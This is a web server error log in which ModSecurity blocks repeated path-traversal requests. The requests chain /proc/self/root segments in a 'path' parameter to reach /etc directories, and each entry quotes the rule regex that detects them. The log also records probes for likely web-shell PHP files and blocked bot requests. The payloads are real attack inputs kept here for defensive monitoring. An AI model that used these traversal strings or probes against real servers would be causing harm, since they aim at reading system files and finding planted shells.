[Wed Mar 18 14:37:34.019398 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:36604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abri3uw_le52K8_3pV0FSgAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:37:39.202136 2026] [:error] [pid 14269:tid 140411557287680] [client 74.7.243.128:52316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abri4wbLMZ6AikZjR9Xn0gAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:37:50.471052 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:35638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abri7gkwaGbbGflqUZA6RQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 14:38:11.987185 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:53122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjA0zinOy1jxa1j4dC3wAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:38:23.755522 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:50114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjD-oXxyEfFpUF8f-aIQAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:39:25.334838 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.244.43:34962] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrjTQbLMZ6AikZjR9XoUAAAAAY"]
[Wed Mar 18 14:39:28.841509 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:34538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjT-oXxyEfFpUF8f-alwAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:39:30.671012 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.228.61:34460] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrjUgbLMZ6AikZjR9XoXQAAAAc"]
[Wed Mar 18 14:39:47.035400 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:44404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjYcdf6f5d65gmYZT9kAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:40:52.223320 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:58070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjpOoXxyEfFpUF8f-bBwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:40:55.638142 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:59440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjp0zinOy1jxa1j4dDnQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:40:56.928069 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:42730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjqAkwaGbbGflqUZA7CAAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:41:07.167387 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:55464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjsymAPhZkrhU8w4mV8wAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:41:15.635173 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.241.31:36054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrju8df6f5d65gmYZT9-gAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 14:41:15.698869 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:47540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrju-oXxyEfFpUF8f-bGwAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:41:30.867383 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:39398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjyvu8EFLIOrSqIpsrGgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:41:36.105125 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:49128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrjzuoXxyEfFpUF8f-bLwAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:41:39.020975 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:49138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj00zinOy1jxa1j4dD3gAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:41:47.250694 2026] [access_compat:error] [pid 17887:tid 140411641214720] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rip.php
[Wed Mar 18 14:41:47.525683 2026] [access_compat:error] [pid 17887:tid 140411624429312] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ms-edit.php
[Wed Mar 18 14:41:48.376136 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:45866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj3Mdf6f5d65gmYZT-JAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:41:51.859292 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:35248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj3-oXxyEfFpUF8f-bSQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:41:53.664786 2026] [access_compat:error] [pid 17887:tid 140411716749056] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ioxi-o.php
[Wed Mar 18 14:41:56.433834 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:35258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj4-oXxyEfFpUF8f-bUAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:41:56.436306 2026] [access_compat:error] [pid 17887:tid 140411548894976] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/adminfuns.php
[Wed Mar 18 14:41:58.948117 2026] [autoindex:error] [pid 17887:tid 140411741927168] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/thickbox/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:03.701891 2026] [access_compat:error] [pid 17887:tid 140411582465792] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sf.php
[Wed Mar 18 14:42:04.898347 2026] [autoindex:error] [pid 17887:tid 140411540502272] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:06.195537 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:57394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 